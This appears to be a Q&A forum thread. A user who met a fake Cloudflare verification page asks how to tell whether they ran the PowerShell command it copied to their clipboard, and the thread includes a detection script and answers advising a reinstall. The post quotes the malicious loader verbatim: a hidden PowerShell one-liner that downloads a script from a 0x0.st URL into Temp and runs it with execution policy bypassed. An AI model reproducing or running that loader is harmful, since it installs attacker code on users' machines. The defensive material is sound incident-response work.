While scrolling through Reddit, I came across an ad for a site called Astoria Luxe. I clicked on it, and a new tab opened with a Cloudflare verification box. I checked the box, but then it prompted me to run some commands in the Windows Run dialog. I was on autopilot and almost did it, but I don't think I actually executed the script that was copied to my clipboard. Here's the code I found:
`powershell -w h -nop -c "$i='https://[0x0.st]/8kaQ.dof';$z="$env:TEMP$([guid]::NewGuid()).ps1";$f=New-Object -Com Microsoft.XMLHTTP;$f.open('GET',$i,$false);$f.send();Set-Content $z $f.responseText;cmd /c start powershell -w h -ep Bypass -f $z"`
What steps can I take to check if my computer downloaded the script from that URL? I'm pretty sure I didn't run it, but I want to be certain.
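The artifact check the question asks for, written out as an added example (it is not from the post or either answer). It only reads local logs, the registry and the temp folders, never contacts the URL, and uses the host name and file-naming pattern from the pasted one-liner; run it from an elevated PowerShell.

```powershell
# Added example: looks for traces the pasted one-liner would leave if it had
# actually been executed. Nothing here downloads anything.
$Indicator = '0x0.st'   # download host from the posted command
$Findings  = @()

# 1. Run dialog history. Windows writes RunMRU only when a command is executed
#    via Win+R, so a matching entry means the line was really run.
$runMru = Get-ItemProperty 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -ErrorAction SilentlyContinue
$runMru.PSObject.Properties |
  Where-Object { $_.Name -ne 'MRUList' -and $_.Value -match 'powershell|0x0\.st' } |
  ForEach-Object { $Findings += "RunMRU entry $($_.Name): $($_.Value)" }

# 2. The dropped script. The posted command builds the path as
#    "$env:TEMP$([guid]::NewGuid()).ps1" with no separator, so the file would
#    land beside the Temp folder as Temp<guid>.ps1; check both locations.
$guidName = '[0-9a-f]{8}(-[0-9a-f]{4}){3}-[0-9a-f]{12}\.ps1$'
$dirs = @($env:TEMP, (Split-Path $env:TEMP -Parent))
Get-ChildItem -Path $dirs -Filter '*.ps1' -File -ErrorAction SilentlyContinue |
  Where-Object { $_.Name -match $guidName } |
  ForEach-Object { $Findings += "Dropped script candidate: $($_.FullName) ($($_.LastWriteTime))" }

# 3. PowerShell engine start events (ID 400, logged by default) carry the full
#    command line; 4104 script block events are present if that logging is on.
Get-WinEvent -FilterHashtable @{LogName='Windows PowerShell'; Id=400} -ErrorAction SilentlyContinue |
  Where-Object { $_.Message -match "$Indicator|-ep Bypass|Microsoft\.XMLHTTP" } |
  ForEach-Object { $Findings += "PowerShell engine start at $($_.TimeCreated) with matching command line" }
Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-PowerShell/Operational'; Id=4104} -ErrorAction SilentlyContinue |
  Where-Object { $_.Message -match "$Indicator|Microsoft\.XMLHTTP" } |
  ForEach-Object { $Findings += "Script block logged at $($_.TimeCreated)" }

# 4. DNS client cache (cleared on reboot). Only the loader would resolve the
#    download host, so a cached entry means the GET was at least attempted.
Get-DnsClientCache -ErrorAction SilentlyContinue |
  Where-Object { $_.Entry -like "*$Indicator*" } |
  ForEach-Object { $Findings += "DNS cache entry: $($_.Entry) -> $($_.Data)" }

if ($Findings) { $Findings | ForEach-Object { Write-Warning $_ } }
else { Write-Host 'No artifacts of the pasted command found (RunMRU, temp folders, PowerShell logs, DNS cache).' }
```

An empty result is reassuring but not proof if the machine has been rebooted (DNS cache) or the temp folder cleaned; the event log checks survive both.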
2 Answers
Always remove suspicious links. If you followed those instructions, you might be infected. I'd recommend wiping your PC and resetting passwords everywhere. Just a heads up, though—it's hard to believe someone would actually follow those steps. You might be trolling us!
If you did execute that command, the safest route is to reinstall Windows using a USB stick. After that, change all your passwords and set up two-factor authentication for added security.
I put brackets around the link to avoid issues. I mentioned I didn't actually run it, just shared the URL in case someone wants to analyze it on a VM to see what it does.